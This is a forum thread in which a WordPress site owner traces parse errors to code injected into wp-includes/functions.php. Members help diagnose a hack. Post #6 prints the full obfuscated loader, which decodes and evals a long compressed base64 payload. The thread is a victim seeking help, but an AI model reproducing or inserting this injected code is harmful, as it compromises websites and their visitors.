Hello and welcome to our community! Is this your first visit?
Register
Enjoy an ad free experience by logging in. Not a member yet? Register.
Results 1 to 8 of 8
  1. #1
    New to the CF scene
    Join Date
    May 2013
    Posts
    8
    Thanks
    1
    Thanked 0 Times in 0 Posts

    Exclamation Parse error: syntax error, unexpected T_DNUMBER

    Ok,
    I have a re-seller hosting account with Godaddy and ALL of my websites made on Wordpress are displaying the same message:

    Code:
    Parse error: syntax error, unexpected T_DNUMBER in /home/content/63/7575663/html/tst500/loughtonmasterbuild/wp-includes/functions.php(2331) : runtime-created function(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 1
    The functions.php aren't always in the same folder of course but it;s always the same issue and some of them are displaying the code above AND this one:

    Code:
    Warning: Cannot modify header information - headers already sent by (output started at /home/content/63/7575663/html/pump500/wp-includes/functions.php(2331) : runtime-created function(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code:1) in /home/content/63/7575663/html/pump500/wp-includes/pluggable.php on line 876
    I seriously have no idea what's happened. All Godaddy could say is that I've been hacked but I am really stuck as all of these websites are friend's/clients websites.

  • #2
    Senior Coder
    Join Date
    Feb 2011
    Location
    Your Monitor
    Posts
    4,341
    Thanks
    60
    Thanked 527 Times in 514 Posts
    Blog Entries
    4
    The unexpected <whatever> message often indicates a missing ; at the end of the line of code above.
    See my new CodingForums Blog: http://www.codingforums.com/blogs/tangoforce/

    Many useful explanations and tips including: Cannot modify headers - already sent, The IE if (isset($_POST['submit'])) bug explained, unexpected T_CONSTANT_ENCAPSED_STRING, debugging tips and much more!

  • #3
    New to the CF scene
    Join Date
    May 2013
    Posts
    8
    Thanks
    1
    Thanked 0 Times in 0 Posts
    Thanks for the reply . I tried looking for a missing ; but no luck. Line 2331 is this:

    Code:
    $bb4 = create_function('$'.'v',$ab[20].$ab[14].$ab[15].$ab[2].$ab[4].$ab[8].$ab[11].$ab[3].$ab[16].$ab[21].$ab[2].$ab[15].$ab[12].$ab[20].$ab[4].$ab[13].$ab[15].$ab[9].$ab[20].$ab[7].$ab[5].$ab[6].$ab[10].$ab[20].$ab[0].$ab[17].$ab[10].$ab[20].$ab[4].$ab[1].$ab[14].$ab[18].$ab[18].$ab[18].$ab[22]);
    Any thoughts?

  • #4
    Senior Coder
    Join Date
    Feb 2011
    Location
    Your Monitor
    Posts
    4,341
    Thanks
    60
    Thanked 527 Times in 514 Posts
    Blog Entries
    4
    Yes I have one thought, you need to re-read my first reply and look at the line ABOVE. Not line 2331, line 2330. I made that quite clear yet you've come back thinking you understood my advice and quoted the line in the error message instead of the line ABOVE.

    Also you have so much eval'd code there I wouldn't be surprised if you have been hacked. The line of code you've shown doesn't look like something a normal php programmer would write. It looks more like something a hacker would use / insert as its obfuscated (in other words written to be extremely hard to understand).
    See my new CodingForums Blog: http://www.codingforums.com/blogs/tangoforce/

    Many useful explanations and tips including: Cannot modify headers - already sent, The IE if (isset($_POST['submit'])) bug explained, unexpected T_CONSTANT_ENCAPSED_STRING, debugging tips and much more!

  • #5
    Regular Coder Arcticwarrio's Avatar
    Join Date
    May 2012
    Location
    UK
    Posts
    721
    Thanks
    20
    Thanked 84 Times in 84 Posts
    im not sure what the 1st parameter would output like that

    create_function('$'.'v',
    There are 10 types of people on CodingForums,
    Those who understand Binary and those who dont.
    Get Cloud Hosting now from only£59 / month

  • #6
    New to the CF scene
    Join Date
    May 2013
    Posts
    8
    Thanks
    1
    Thanked 0 Times in 0 Posts
    It's happened on all of my Wordpress websites. Supposedly it's hackers/malware.

    They have put:

    Code:
    $md5 = "d8664106a94ab73504b8489871e32c8d";
    $ab = array('e','z',"s","6",')','d','r','b',"(",'l',"a",'v','n',"i","$",'4',"c",';',"o",'_','t',"f","g");
    $bb4 = create_function('$'.'v',$ab[0].$ab[11].$ab[10].$ab[9].$ab[8].$ab[22].$ab[1].$ab[13].$ab[12].$ab[21].$ab[9].$ab[10].$ab[20].$ab[0].$ab[8].$ab[7].$ab[10].$ab[2].$ab[0].$ab[3].$ab[15].$ab[19].$ab[5].$ab[0].$ab[16].$ab[18].$ab[5].$ab[0].$ab[8].$ab[14].$ab[11].$ab[4].$ab[4].$ab[4].$ab[17]);
    $bb4('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');
    function _ajax_wp_die_handler( $message = '' ) {
    	if ( is_scalar( $message ) )
    		die( (string) $message );
    	die( '0' );
    }
    In all of my functions.php files in wp_includes. Absolute w*nkers.
    I have to go through each site and remove the code for anyone looking for the same fix. It's the only solution.

  • #7
    Regular Coder Arcticwarrio's Avatar
    Join Date
    May 2012
    Location
    UK
    Posts
    721
    Thanks
    20
    Thanked 84 Times in 84 Posts
    regular site backups are also a good option
    There are 10 types of people on CodingForums,
    Those who understand Binary and those who dont.
    Get Cloud Hosting now from only£59 / month

  • #8
    Senior Coder
    Join Date
    Feb 2011
    Location
    Your Monitor
    Posts
    4,341
    Thanks
    60
    Thanked 527 Times in 514 Posts
    Blog Entries
    4
    Quote Originally Posted by tstwebdesign View Post
    I have to go through each site and remove the code for anyone looking for the same fix. It's the only solution.
    You could always download all your files to your PC, open them ALL in notepad++ and then use the search facility to search all open files.
    See my new CodingForums Blog: http://www.codingforums.com/blogs/tangoforce/

    Many useful explanations and tips including: Cannot modify headers - already sent, The IE if (isset($_POST['submit'])) bug explained, unexpected T_CONSTANT_ENCAPSED_STRING, debugging tips and much more!


  •  

    Tags for this Thread

    Posting Permissions

    • You may not post new threads
    • You may not post replies
    • You may not post attachments
    • You may not edit your posts
    •